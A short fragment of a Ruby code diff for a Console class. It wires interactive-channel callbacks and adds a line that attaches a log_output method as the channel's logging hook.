# If the packet is a response, try to notify any potential
|
494
507
|
# waiters
|
495
508
|
if ((resp = packet.response?))
|
@@ -83,6 +83,7 @@ class Console
|
|
83
83
|
channel.extend(InteractiveChannel) unless (channel.kind_of?(InteractiveChannel) == true)
|
84
84
|
channel.on_command_proc = self.on_command_proc if self.on_command_proc
|
85
85
|
channel.on_print_proc = self.on_print_proc if self.on_print_proc
|
86
|
+
channel.on_log_proc = method(:log_output) if self.respond_to?(:log_output, true)
|
86
87
|
|
87
88
|
channel.interact(input, output)
|
88
89
|
channel.reset_ui
|